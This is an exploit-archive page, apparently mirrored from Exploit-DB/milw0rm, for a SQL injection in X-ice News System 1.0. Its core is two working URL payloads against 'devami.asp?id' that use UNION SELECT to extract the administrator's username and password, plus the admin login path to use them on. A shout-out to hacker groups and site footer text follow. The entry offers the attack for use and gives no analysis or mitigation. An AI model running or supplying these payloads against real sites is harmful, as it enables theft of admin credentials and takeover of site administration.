[] NeoSense
E X P L O I T S
title author type platform port cve id

X-ice News System 1.0 - 'devami.asp?id' SQL Injection

Author: CyberGhost
type: webapps
platform: asp
port: 
date_added: 2007-03-12 
date_updated: 2016-09-27 
verified: 1 
codes: OSVDB-34040;CVE-2007-1570;CVE-2007-1438 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comxice_haberv1.zip
Title  : X-ice News System v1.0 Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://www.x-ice.org/haber%5Fv1/
#Download : http://aspindir.com/indir.asp?id=4601&sIslem=%DDndir

Vuln.

Username : /devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
Password : /devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

Login : /admin/kontrol.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - SaCReD SeeR - MaTRaX - by_emR3 - kerem125 - Bolivar - All TiTHaCK Members

And All TURKISH HACKERS !

# milw0rm.com [2007-03-13]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.